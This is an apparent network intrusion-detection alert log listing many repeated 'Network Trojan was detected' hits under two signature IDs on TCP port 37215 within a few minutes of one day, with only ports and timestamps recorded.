            SID:2829579
            Source Port:41652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840164
            SID:2835222
            Source Port:54166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.747159
            SID:2829579
            Source Port:34612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945286
            SID:2835222
            Source Port:45024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276150
            SID:2835222
            Source Port:48872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003990
            SID:2829579
            Source Port:55394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754559
            SID:2835222
            Source Port:46706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.244216
            SID:2835222
            Source Port:48856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696329
            SID:2829579
            Source Port:34574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953406
            SID:2835222
            Source Port:45898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.485971
            SID:2829579
            Source Port:45900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722159
            SID:2829579
            Source Port:53842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818507
            SID:2829579
            Source Port:55452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.485830
            SID:2835222
            Source Port:43206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.773935
            SID:2835222
            Source Port:39452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.925243
            SID:2829579
            Source Port:54976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.884590
            SID:2829579
            Source Port:49266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871382
            SID:2835222
            Source Port:40502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939258
            SID:2835222
            Source Port:35568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052516
            SID:2835222
            Source Port:57056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.860483
            SID:2829579
            Source Port:50704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.784700
            SID:2829579
            Source Port:56606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.357221
            SID:2835222
            Source Port:41720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344931
            SID:2835222
            Source Port:40004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.704437
            SID:2829579
            Source Port:34436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.590639
            SID:2835222
            Source Port:54186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601724
            SID:2835222
            Source Port:35898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861808
            SID:2835222
            Source Port:35952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862931
            SID:2829579
            Source Port:37458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333793
            SID:2829579
            Source Port:51878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611224
            SID:2835222
            Source Port:33374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969789
            SID:2829579
            Source Port:54130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853415
            SID:2835222
            Source Port:33282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855652
            SID:2829579
            Source Port:35256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675418
            SID:2829579
            Source Port:43674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377777
            SID:2829579
            Source Port:36622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778791
            SID:2829579
            Source Port:57474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031606
            SID:2829579
            Source Port:43598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038963
            SID:2829579
            Source Port:55282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066783
            SID:2835222
            Source Port:48120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.687707
            SID:2829579
            Source Port:45778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.026484
            SID:2835222
            Source Port:50572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.591656
            SID:2829579
            Source Port:43738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899121
            SID:2835222
            Source Port:35516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739932
            SID:2829579
            Source Port:55330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061171
            SID:2829579
            Source Port:49350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995592
            SID:2829579
            Source Port:38646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020717
            SID:2829579
            Source Port:40092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555159
            SID:2829579
            Source Port:54400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.633481
            SID:2829579
            Source Port:35996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326206
            SID:2829579
            Source Port:48342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767273
            SID:2835222
            Source Port:35764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773165
            SID:2835222
            Source Port:47500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436517
            SID:2835222
            Source Port:55666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559111
            SID:2829579
            Source Port:59418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.988451
            SID:2835222
            Source Port:53658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047892
            SID:2829579
            Source Port:50236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059656
            SID:2835222
            Source Port:48574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805544
            SID:2835222
            Source Port:57840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853437
            SID:2835222
            Source Port:41812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.063657
            SID:2829579
            Source Port:42984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.834016
            SID:2835222
            Source Port:60936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824814
            SID:2829579
            Source Port:38842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922175
            SID:2829579
            Source Port:54398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956766
            SID:2829579
            Source Port:39322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810257
            SID:2829579
            Source Port:42222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723826
            SID:2835222
            Source Port:38166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764101
            SID:2829579
            Source Port:39782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309359
            SID:2835222
            Source Port:40854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804744
            SID:2829579
            Source Port:34344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.766979
            SID:2829579
            Source Port:56082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.317132
            SID:2829579
            Source Port:59504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778415
            SID:2829579
            Source Port:60210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862658
            SID:2835222
            Source Port:54792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.848418
            SID:2829579
            Source Port:33590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.993616
            SID:2829579
            Source Port:53632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903126
            SID:2829579
            Source Port:34540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352428
            SID:2835222
            Source Port:53296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432649
            SID:2835222
            Source Port:35512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507714
            SID:2829579
            Source Port:41640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877576
            SID:2829579
            Source Port:57298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817421
            SID:2835222
            Source Port:44468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377966
            SID:2835222
            Source Port:46986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920178
            SID:2829579
            Source Port:56182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.524528
            SID:2829579
            Source Port:40798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857917
            SID:2829579
            Source Port:40676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934294
            SID:2835222
            Source Port:37398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014497
            SID:2835222
            Source Port:47486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837831
            SID:2829579
            Source Port:38010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775563
            SID:2829579
            Source Port:35938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.774502
            SID:2835222
            Source Port:41954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957133
            SID:2835222
            Source Port:34026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.441282
            SID:2835222
            Source Port:37064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767910
            SID:2829579
            Source Port:36950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864545
            SID:2829579
            Source Port:33750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039213
            SID:2835222
            Source Port:54190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.051593
            SID:2829579
            Source Port:40234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.216658
            SID:2829579
            Source Port:43728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966708
            SID:2829579
            Source Port:36890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955708
            SID:2829579
            Source Port:59654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307486
            SID:2829579
            Source Port:37528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927289
            SID:2829579
            Source Port:33096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.523712
            SID:2829579
            Source Port:41472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.738753
            SID:2835222
            Source Port:46258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850476
            SID:2835222
            Source Port:37362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.063558
            SID:2835222
            Source Port:52762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837103
            SID:2835222
            Source Port:36282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679639
            SID:2835222
            Source Port:46532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.747012
            SID:2829579
            Source Port:41132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543260
            SID:2829579
            Source Port:48610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789291
            SID:2835222
            Source Port:52324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581069
            SID:2835222
            Source Port:49578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704733
            SID:2835222
            Source Port:34712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741363
            SID:2829579
            Source Port:59380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.779947
            SID:2835222
            Source Port:32836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.073027
            SID:2835222
            Source Port:46260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.284462
            SID:2829579
            Source Port:55234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058503
            SID:2835222
            Source Port:36894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832265
            SID:2829579
            Source Port:50494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.729365
            SID:2835222
            Source Port:52492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.920231
            SID:2829579
            Source Port:42350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604690
            SID:2835222
            Source Port:48868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929497
            SID:2835222
            Source Port:50338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300210
            SID:2829579
            Source Port:35388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067775
            SID:2835222
            Source Port:53540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067703
            SID:2835222
            Source Port:54474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047082
            SID:2835222
            Source Port:45682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773920
            SID:2835222
            Source Port:51486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668930
            SID:2829579
            Source Port:54626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985307
            SID:2835222
            Source Port:60080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030910
            SID:2835222
            Source Port:33322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840086
            SID:2829579
            Source Port:50350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857891
            SID:2835222
            Source Port:37142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968359
            SID:2835222
            Source Port:33624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.004680
            SID:2835222
            Source Port:48046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.049271
            SID:2835222
            Source Port:44988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541438
            SID:2829579
            Source Port:46944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.441280
            SID:2835222
            Source Port:45918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669486
            SID:2829579
            Source Port:55220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873275
            SID:2829579
            Source Port:55688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486795
            SID:2835222
            Source Port:47672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.072410
            SID:2835222
            Source Port:53138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899780
            SID:2829579
            Source Port:60726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.495246
            SID:2829579
            Source Port:36778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.182219
            SID:2829579
            Source Port:53118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746228
            SID:2829579
            Source Port:55588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222008
            SID:2835222
            Source Port:48272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507970
            SID:2835222
            Source Port:41642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055971
            SID:2829579
            Source Port:52340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459613
            SID:2829579
            Source Port:34260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.958489
            SID:2835222
            Source Port:45474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869248
            SID:2835222
            Source Port:49344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.652618
            SID:2829579
            Source Port:44830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450818
            SID:2835222
            Source Port:33834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507683
            SID:2829579
            Source Port:34030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.664075
            SID:2829579
            Source Port:38206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.962239
            SID:2829579
            Source Port:48116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.761883
            SID:2829579
            Source Port:50294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776912
            SID:2829579
            Source Port:47920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610919
            SID:2829579
            Source Port:45264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.881872
            SID:2829579
            Source Port:45262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818604
            SID:2835222
            Source Port:55546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001443
            SID:2829579
            Source Port:39972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944148
            SID:2835222
            Source Port:48216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.738712
            SID:2835222
            Source Port:50054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469432
            SID:2829579
            Source Port:56218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881967
            SID:2835222
            Source Port:49494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904102
            SID:2835222
            Source Port:54408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584630
            SID:2829579
            Source Port:34208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.604913
            SID:2829579
            Source Port:55772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291058
            SID:2835222
            Source Port:59294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336891
            SID:2829579
            Source Port:42844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755850
            SID:2835222
            Source Port:58066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956584
            SID:2835222
            Source Port:55768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856295
            SID:2829579
            Source Port:46752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645772
            SID:2829579
            Source Port:43152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563407
            SID:2835222
            Source Port:60860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772604
            SID:2829579
            Source Port:39490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.373720
            SID:2835222
            Source Port:33238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780170
            SID:2829579
            Source Port:37866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933804
            SID:2835222
            Source Port:45886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.067546
            SID:2829579
            Source Port:56270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812154
            SID:2829579
            Source Port:37308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870275
            SID:2829579
            Source Port:60394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.413102
            SID:2835222
            Source Port:36894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.808301
            SID:2829579
            Source Port:45744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.916609
            SID:2835222
            Source Port:35116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880632
            SID:2829579
            Source Port:48592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994128
            SID:2835222
            Source Port:51248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855694
            SID:2829579
            Source Port:39692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818324
            SID:2835222
            Source Port:53452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.919287
            SID:2835222
            Source Port:42292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543374
            SID:2829579
            Source Port:41990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.784178
            SID:2829579
            Source Port:48640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777591
            SID:2835222
            Source Port:43598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308292
            SID:2829579
            Source Port:42018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.585061
            SID:2835222
            Source Port:42310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026845
            SID:2829579
            Source Port:57674
            Destination Port:37215
